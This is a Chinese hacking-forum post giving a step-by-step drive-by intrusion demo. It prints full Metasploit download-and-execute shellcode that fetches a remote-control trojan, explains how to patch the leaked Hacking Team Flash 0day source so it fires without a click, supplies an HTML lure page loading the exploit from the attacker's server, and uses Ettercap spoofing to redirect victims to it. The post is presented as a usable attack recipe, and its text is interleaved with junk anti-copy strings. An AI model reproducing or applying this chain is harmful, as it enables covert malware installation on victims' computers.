找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1394|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

7 D% ]9 C* v( D0 d- { 三、flash 0day之手工代码修改制作下载者实例入侵演示 4 y: V3 z, m ]3 _" X0 g

* M# ^/ z; c+ O G# c9 I: _* x# U

5 X- j& T1 c" ~ 利用到的工具: + X' v5 U5 z. t! _) I- v: E g

% i4 t6 v( \4 p

( J \4 s* n4 s! }9 c. l6 {9 J } Msf + L" p6 m5 ~- c3 d: B2 ^9 c

- n; w8 V3 `% F

; T: e0 p! s: g& S. r* x8 h) A Ettercap . l3 Y1 k3 L+ B. O r% ?& d$ ~

$ c3 S$ o1 p( ] L$ {

. a3 N4 L1 I) ~; J) ` Adobe Flash CS6 ( h2 ?5 ^6 B9 h* t1 T

8 u+ \2 \7 q/ t

0 U& o5 i* M$ i Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 . d: H" t$ U( H! r

% y& g' }/ ~5 N: _' f) }9 L

b7 I w4 `0 W+ h. T. j 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options + ^% D& o5 c; V* \; m0 C, u

& ~. H% k, A8 |8 c

$ v5 t9 N- V1 A( P1 |: G 如图: ! l8 O) t w3 j) h( ]

6 X* i8 [. ~4 U2 q, e& u

4 i+ u$ ?- L% x5 A   * h) c0 c' O' H5 T3 S O

+ D+ `6 q( c) u: j

0 r G( V8 n; ~& r! X/ \ n   3 |- O0 v' A$ O, p4 j! h

0 l1 Q3 D8 K, p1 ]3 F( s; t

$ k$ R' z& O6 S9 X% |& { 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: * P) a6 D" p- G8 o8 w& S% U

: D7 f1 W7 E7 j

7 \2 E* l/ T: J; v4 r   - x4 |7 f# M* P2 h0 b

6 v, K$ v$ o+ T" z2 y, E

! e6 M' {. D- r V. W l   1 z: m; s" e$ w/ f3 k4 P/ S* |+ H3 R

$ {% j" Q( G7 f

" |3 c- r# n0 u' u+ } 然后执行generate -t dword生成shellcode,如下: : r/ e+ N4 c' W5 r

" n: w4 v+ M3 \! m5 _+ W. Y

' J, B f) h1 l+ H6 O! P   0 ~2 `+ R, H1 H7 w# R

5 ?7 s' R* U! M W

; n) B' c' Y% U 复制代码到文本下便于我们一会编辑flash exp,如下: : }$ V7 Y# ?9 d3 @1 Q

" Z( f" c8 N4 V/ [% c+ f& f( Q# Q8 O0 S

: l7 j) `0 h: U1 V$ R& } 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, , f! u( m) p3 n1 t# @

; y; I$ B+ w5 r* g$ e* C& Y

, ^% A1 W+ C% C2 ^) S! w2 F! u/ N 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, $ R0 @- n V6 o* _; Y2 z

2 S2 X$ W: x6 C# @' q

- G1 t; j- d* T6 m- D1 c6 a9 J 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, : `5 P+ [6 L1 J& B

! t6 o, o' m1 V2 P0 a

- Y: A0 S2 V" D9 m7 X- c 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ) O* v7 M! }" Z. k L

" G' [: Q7 b R# Q' P/ S6 P& @

' g b( M4 K v& d/ @ 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 0 q- G5 K! [2 G2 _, Y9 l" u

1 `6 m4 X0 x; }6 }* |

+ X. c6 F3 w n$ M7 V 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 0 ]4 H$ d% c1 o3 K8 s h

. k7 o4 p) t# E: o

5 _" N$ I0 ?2 G" I3 v0 J 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ! A! |+ d, D( Y4 C

' C E/ V. {- l$ z+ C7 O. Q

0 P1 H' c2 t1 k- } 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ! u" d) F2 ?: ~1 \3 }

3 G% o& B) c% c3 I& i

# u; M2 ~- j, `8 Z1 y 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, # i. R. A* A i$ R- k2 ^

N6 Y9 D# f1 ?" @

. c$ C) M% h; f) H5 I4 v: @" | 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ( p1 y h3 } T8 Y+ e. A+ r3 v

+ }* k' W& S6 N/ c

; @4 D- [5 k: N* \$ E9 M0 j! }" ` 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, # P4 Q; b* k9 W( Z0 ^

9 O; C# B) i- @ [

) {& t% y2 {: d4 m+ S1 K' q/ t6 y. a 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, - c/ e" o- i; f+ b: z

a- z& V) N& w7 `' G, ^0 V& D

* J4 u+ p) p1 Y% l 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 2 k8 u9 Z5 v1 j% D

+ k3 L y y8 }- S: y( w% O

$ l) I [% B' o) e; W 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 2 _# r5 W5 x; f; _

9 D# |/ J5 t4 I8 S. ~

3 L* m8 ?& ]; o; o! U7 f( T8 g$ G   5 @+ ~1 d/ n2 y6 W, ?8 s

/ ^+ r" {5 K+ D" M5 A7 W

8 M- }7 O! a( H* d   ' N5 l' J/ [8 D0 ?. f6 O

8 q. C! @3 h+ I+ ]6 s

+ X) {# Z% ] ^% o. r- P 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 4 P/ A) v, r8 v5 O! d3 K' g

! Z. L1 a7 ?6 s F# d; F; ]

3 o3 f# g* z3 o+ b, ]( @7 t   1 \! q- t1 t% K- V/ Q6 D R2 c

9 _6 H5 @' E& Q! @. N

6 `1 R; a, |3 o; Q7 C) y 先修改ShellWin32.as,部分源代码如图: # `' N, \, K0 I/ u7 Y

2 l D' u! R& Y( J

4 ~& ~5 D9 ]7 \" ?% s$ q2 H9 r9 _   0 d) l6 t3 m0 L2 C# D* ]5 g

' Y% E! _& x5 @( c! {7 F

) _; C% U% K. ]- h, U 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ; v7 d% M+ G2 Z b( z, C) a

( g1 `4 b x3 f! E" L

+ M5 u( J# O) K9 x6 @* c& f   # ]* ]: |" t0 {- r2 s' ^

- H4 N& I5 H5 w

: {" Q t" b" W- A 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 9 b/ v' y3 O. z, T

& x9 F& G) c: j8 S f! z7 _. ~

8 R: V1 s' f6 ?0 c* x( A( F2 X   ) h! z. v0 x7 \# K! H

8 Q9 x7 w. o2 P2 f' j( M/ `8 Y% ?. A

% Z8 d; t7 u! g- ?' \8 c% S 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: : T% N% N5 t+ l1 K' C# ~7 V

. I3 h# D1 i: F) z* [" v1 k

5 N. @6 k P* p+ T5 g   ' N! I3 }! W6 h: l N

& G# d8 H: ]; `, y% |& \

6 j+ A# Y5 I6 l& T$ }% X5 ^   . `2 p) c. l# M5 k

$ l6 b% p P7 m% O3 ~2 x, h6 h

2 W) y5 c% k/ r( O   6 x( ?0 C0 I6 y8 j# B! b

3 I9 T) y4 o2 x d$ A# |7 x3 v

% m, H' [# x- \; ^$ `7 l! b! e 然后点保存,下面我们来编译一下,打开 8 b/ U0 l* X" l3 n" }% H& b1 Z

- S& J, Q, w0 ]7 j! l% i$ E/ ~6 X

& R8 O/ Y& K* `7 X* W exp1.fla然后点文件-发布,看看编译没错误 8 J% o/ l+ m$ ^8 S5 Y0 M

0 i! k! O' c T3 A; M- ~1 S0 x2 Y

8 s9 d. q7 b6 L' l1 I4 x' w! O   ' P* v' J9 o: |% s$ r1 x

( |6 _) i2 E( N9 s+ S* y. n& v9 X

5 \4 Z6 V- k! a3 b- U, o   ) Q9 q. l9 k# Y3 w0 g4 L2 k1 q

6 I. S1 ?# H/ Z: j4 ]

' S/ [, ]# k! V( \! m   9 W# t; N7 |- E1 K% S

+ q' d' y! T4 {, I! Q) \

$ t; I5 E1 G" G3 A; m$ l   8 O4 I8 K; U1 c6 U' M

6 c8 v& q) |- |9 y: T$ P

: ?4 z, x \2 a0 m- @9 ` 然后我们把生成的 ; Q( v8 C: o( V. K6 D- o

, v3 v. A" b% }! z

9 e7 f8 B$ p; Z! L* q' n% w exp1.swf丢到kailinux /var/www/html下: 7 G0 G0 I' W( [

! X: w! h4 d" e9 I0 d' S

' D T+ m/ _( G4 R( u$ u' k3 A 然后把这段代码好好编辑一下 4 N* g' n1 {3 Y

p6 r3 ~: M8 G5 [ }

- d- f! n* u6 Q% B& G6 ~7 c+ z   / \, f1 Z: m: G2 T

* O- O% k6 x$ [0 I/ e4 H

" c8 C# \' j2 X" x4 Y! h   i7 w) j" `7 _/ f+ o* I, i P

4 u9 K$ G6 E5 j- [7 P$ [

- C7 l4 B* I% n: y' C8 e7 W   : h% f; f0 f! Z0 _+ ~0 t n

. ~3 B% F4 @6 }' |% @" R

+ V% @# {0 j. [) X _   ' l/ E9 l u: d" z

; U! N8 y' x( J

; Y6 P0 U, ^. D( f! |9 ^! A( J) G   . }9 T$ ?% u% S3 G# U

9 p; R# _6 V& P$ k; a" j( b

2 A9 G+ b, ]0 n4 |. z   5 V" d8 y1 X, x

. c7 y% H( U5 m E r% s- @5 x

- B2 d/ C% l! I h <!DOCTYPE html> 5 o8 t6 [! J. e: n" V' N1 O, l; h

) C. C9 h& }% r* L' G7 q

! Y3 l. e4 ^+ g <html> 6 U5 P3 I$ K+ H

& y: e9 L# k& s( _, e# _# @0 s

% i' c! H/ m7 F5 s$ g <head> 0 c+ c3 s1 ]0 V* W6 k. R

" |& p3 s/ {- y) m) t; E l

, \- j5 N& m) _% N) @ <meta http-equiv="Content-Type" content="text/html; % f7 X# D& O1 _6 I2 ~

6 Q+ g/ Y" h/ H, ~# o5 k4 x

) @7 Z8 a, R! F" Z9 Y+ x8 j; ~6 R! c charset=utf-8"/> ( }. r% N! |' \! h/ O( ~

2 p# e+ K' c; j: y8 V3 E* l9 V

3 ?8 h# i! }/ g </head> 1 [: D: U8 [6 [

5 A+ C3 B, @1 O! X6 g# I

1 D/ ?- f; G, |2 [ <body> , G9 z$ i, f. \3 d

* [# P2 r+ F f: p

) K1 Y# @. W Y0 Q* [$ T) C$ x' M <h2> Please wait, the requested page is loading...</h2> 0 v$ z/ i$ G6 k

4 ^5 S4 K$ N s" B: b/ u

; y' O7 t! I) H0 n <br> * D, \1 b7 R# S7 A p# J2 c- K

: I; P. y% P6 v; k7 \' s

/ p8 A& E, f8 t$ s& X <OBJECT ( D7 D8 T5 ~6 G: I& c. b

) h3 N, ?1 C- i+ }

: j2 |% h% }$ Z' g/ N1 N classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 2 M: g3 a3 |! T; E) k

0 Z) ~8 ~; l- D% g2 B4 d

* Q# y: h) o' g$ i/ J VALUE="http://192.168.0.109/exp1.swf"></OBJECT> * x0 B! B a) Z% X6 |9 g- x6 @

' O( ~/ N2 m F" J( t' F0 w

2 L( r3 z5 K a# E: |- {, R: L </body> 6 O8 r; {) `9 [. @$ W- M! |, u% A' o

2 ~* `2 u5 t8 G; S x3 n

/ D0 v& d9 [# I/ m <script> ; K" I. d/ M3 `3 o) B6 K

, F; Q" z" o9 t+ T/ E/ F

]$ `" b# l$ Q     setTimeout(function () { - c- o0 d8 u$ h0 O* o6 H

! s D4 N7 ]* K- T) n

6 ^4 k3 |# ?6 Q& ^1 Q$ x6 i: {, V# I          9 c; c4 B ~& M) B7 b

q: o! I. g+ y- F/ P" |

' C* g4 a$ p0 r7 k window.location.reload(); & O8 K2 h9 u/ E& V. E

. x* h: x* l$ N1 x, e( C; g, ^

5 D: C' V, b ~2 z. k, v3 Q     }, 10000); # r( I7 g1 ^+ k. h

8 g$ ~( K. z; j. C! W* I- J

' {4 U* Y, R# [* E   ( B& V! O8 E3 w# L, G, M. k

1 F4 P j4 c$ b3 D: i

% Y) Y: N' Q2 _3 J </script> 5 m* u" U$ V5 I4 i3 ^

( n- W8 L X1 Z. P* @4 |" n8 `3 C

# F: a* j8 [- n9 G0 J; H </html> 2 A" m3 v! D- z( I

g8 d, [7 U! w4 e5 K9 W: @4 k' P

* Y3 ]. y" l w8 `" a$ H   8 N5 J7 e. V2 h* y

+ @# P+ ]- r2 ?2 c$ R

/ r* o6 X# w0 E8 g$ t 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 4 Q0 J( E+ u( J/ a: X7 c% Q3 u% e

7 M! c( X( t4 J1 } V1 o) \

3 E3 b. G4 B/ ^9 p1 p3 n+ _. p   ( L- p. L" g; m. I

. s& _& Q3 J0 g7 ?

; c8 v/ c. f' ]   5 D% O6 o. U8 I2 o2 n. g

7 Y- y! J; {/ F! c+ _; ^2 ^% n

+ }* n* [$ R0 c" ]$ ]& Q   * q, [4 Y3 m0 B$ h& a r

! f3 X7 e8 k% B( h: x0 r' h

- H3 m% Q7 w8 O- `6 D! P   $ j; _& r# k2 k

! \. S2 z! u! \% o- q; w, [: v

& g6 C$ ]% X7 q$ Y& s, M2 n   2 m3 A9 X1 z8 ~; l! H

0 k' a: b i; J0 i+ U( t2 Q- H

7 U8 U( y& g- c9 a 下面我们用ettercap欺骗如图: # v4 a8 O- p, M5 _0 `! F1 F( m

* o) a7 _ b1 i9 h; h

+ F- g1 J9 i3 c" P- L   # w! t. e+ q m( x/ f

" u. }& r* F8 h# k" A

( `" ^! [8 K3 h) n% Y0 j   $ G: o, j" p; A$ }- [

- G$ U4 y- E! k7 w2 c4 Z

4 ^( y( q. z4 @' Y N5 | 下面我们随便访问个网站看看: 1 W& y6 k/ s) O2 e6 `4 v

3 Q% H5 u9 ~- m0 R

7 u9 v: f- ^7 [) k8 N- x# k 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 9 y7 ]: X1 B$ q1 {0 l

2 p& P( }. o; J$ c9 B

" N& p2 o' B" h2 M$ V   + \8 ^$ u7 x% f( m

: I- @4 I, B. \$ s$ M6 s' i

* a9 Y6 t8 [ a2 V# ?. u5 U 我们看另一台, 0 u8 s, c# L9 B- H. b* m6 f1 v

& p! t; z3 l% d3 B" O0 A

) r1 T' F, u: c5 n. l 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 " b( f$ h* u; A9 g1 b* _* }

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表